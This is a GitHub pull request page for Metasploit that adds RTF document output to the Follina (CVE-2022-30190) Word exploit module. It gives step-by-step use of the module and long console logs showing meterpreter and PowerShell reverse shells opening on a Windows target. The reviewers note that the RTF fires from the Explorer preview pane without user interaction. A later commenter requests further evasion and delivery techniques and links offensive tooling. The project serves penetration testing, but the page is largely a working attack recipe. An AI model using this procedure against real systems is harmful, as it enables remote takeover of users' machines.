Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add rtf support to cve-2022-30190 AKA Follina #16734

Merged
merged 3 commits into from
Aug 25, 2022
Merged

Add rtf support to cve-2022-30190 AKA Follina #16734

merged 3 commits into from
Aug 25, 2022

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Jun 30, 2022
edited
Loading

This PR adds rtf support to the msdtjs exploit 2022-30190, AKA Follina.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • usewindows/fileformat/word_msdtjs_rce
  • set lhost <lhost>
  • set lport <lport>
  • set FILENAME <something.rtf>
  • set OUTPUT_FORMAT rtf
  • run
  • upload the resulting rtf document to a windows target with an unpatched version of Word
  • turn on preview in the file explorer window
  • click on the rtf
  • get a session

Example

msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        msf.docx         no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   rtf              yes       Obfuscate JavaScript content. (Accepted: docx, rtf)
   SRVHOST         10.5.135.101     yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word

msf6 exploit(windows/fileformat/word_msdtjs_rce) > set OUTPUT_FORMAT rtf
OUTPUT_FORMAT => rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set FILENAME rtf.rtf
FILENAME => rtf.rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 26.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] Using URL: http://10.5.135.101:8080/IfjWYa3kZvK1vdJ
[*] Server started.
[*] Generating a malicious rtf file
msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] http://10.5.135.101:8080/IfjWYa3kZvK1vdJ.html
[+] rtf.rtf stored at /home/tmoose/.msf4/local/rtf.rtf
[*] Powershell command length: 3677
[*] 10.5.132.101     word_msdtjs_rce - Sending HTML Payload
[*] 10.5.132.101     word_msdtjs_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4567 -> 10.5.132.101:49762) at 2022-06-30 17:04:57 -0500

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jun 30, 2022
@bwatters-r7 bwatters-r7 marked this pull request as ready for review August 17, 2022 18:53
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 25, 2022
@smcintyre-r7
Copy link
Contributor

Working on Windows 10 with the windows/x64/meterpreter/reverse_tcp and windows/x64/powershell_reverse_tcp payloads.

Testing Output 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.159.128:4444 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] Using URL: http://192.168.159.128:8080/ogr4c1cWefOyFN
[*] Server started.
[*] Generating a malicious docx file
[*] Injecting payload in docx document
[*] Finalizing docx 'msf_psh.rtf'
[+] msf_psh.rtf stored at /home/smcintyre/.msf4/local/msf_psh.rtf
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.109:60570) at 2022-08-25 15:06:50 -0400
msf6 exploit(windows/fileformat/word_msdtjs_rce) > sessions -i 2
[*] Starting interaction with 2...

PS C:\Users\msfuser\AppData\Local\Temp\SDIAG_2c47fc77-f271-451a-aaea-26b6a76f31ca>

@smcintyre-r7
Copy link
Contributor

Alright I'm going to get this landed. Just double checked that the RTF and DOCX files are both working. Also the RTF file is working from the explorer preview, in which case it doesn't even need the user to enable editing.

Testing Output 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Using URL: http://192.168.159.128:8080/rLuZc7WwkUDHqHz
[*] Server started.
[*] Generating a malicious docx file
[*] Injecting payload in docx document
[*] Finalizing docx 'docx_64met.docx'
[+] docx_64met.docx stored at /home/smcintyre/.msf4/local/docx_64met.docx

msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options 

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        docx_64met.docx  no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   docx             yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
   SRVHOST         192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_msdtjs_rce) > set FILENAME rtf_64met.rtf
FILENAME => rtf_64met.rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set OUTPUT_FORMAT rtf
OUTPUT_FORMAT => rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Using URL: http://192.168.159.128:8080/BBa7vVJcAYhC7A
[*] Server started.
[*] Generating a malicious rtf file
[+] rtf_64met.rtf stored at /home/smcintyre/.msf4/local/rtf_64met.rtf

msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options 

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        rtf_64met.rtf    no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   rtf              yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
   SRVHOST         192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_msdtjs_rce) > jobs 

Jobs
====

  Id  Name                                         Payload                              Payload opts
  --  ----                                         -------                              ------------
  0   Exploit: windows/fileformat/word_msdtjs_rce  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:4444
  1   Exploit: windows/fileformat/word_msdtjs_rce  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:5555

msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 192.168.159.109
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.109:61330) at 2022-08-25 17:23:52 -0400
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 192.168.159.109
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.109:58455) at 2022-08-25 17:24:24 -0400

msf6 exploit(windows/fileformat/word_msdtjs_rce) >

@smcintyre-r7 smcintyre-r7 added module enhancement rn-modules release notes for new or majorly enhanced modules and removed rn-enhancement release notes enhancement labels Aug 25, 2022
smcintyre-r7 added a commit that referenced this pull request Aug 25, 2022
@smcintyre-r7
Land #16734, Add rtf support to cve-2022-30190
ae5a9bd 
Add rtf support to cve-2022-30190 AKA Follina
@smcintyre-r7 smcintyre-r7 merged commit 6831322 into rapid7:master Aug 25, 2022
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates the exploit for CVE-2022-30190 (AKA Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.

@hastalamuerte
Copy link

hastalamuerte commented May 1, 2023
edited
Loading

Hello, @smcintyre-r7 thanks for your work, guys!
^_^

Is it possible to improve a follina payload and maybe msf

  1. using not only the msdt handler/service. Maybe ms-search, mshta and edge ones.
    Some info
    https://lolbas-project.github.io/#
    nandisec/mshta@909383b
    https://github.com/AdiMarianMutu/MSHTA-VBS-download-and-execute
    https://github.com/redcanaryco/AtomicTestHarnesses
    https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html
    nandisec/mshta@909383b
    https://blog.syss.com/posts/abusing-ms-office-protos/

  2. Use dns records as a payload
    https://github.com/rtfmkiesel/goldig
    Work nice! Can be transformed into msf

#3. and by signing host and doc file
https://github.com/certbot/certbot

  1. And is it possible to not host a html payload , but contain html scheme inside doc file to hook msdt?

#5. https://twitter.com/Max_Mal_/status/1633102894328168448
https://youtu.be/GiT8Mu_Hws0
New type of macros in doc payload. It seems to use edge url handlers (?).
https://github.com/S3cur3Th1sSh1t/OffensiveVBA
https://github.com/sevagas/macro_pack

@hastalamuerte
Copy link

@bwatters-r7
And plz look on it
https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit

Its new cve doc type of. Ready for metasploit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

Assignees

@smcintyre-r7 smcintyre-r7

Labels
enhancement module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@bwatters-r7 @smcintyre-r7 @hastalamuerte @jvoisin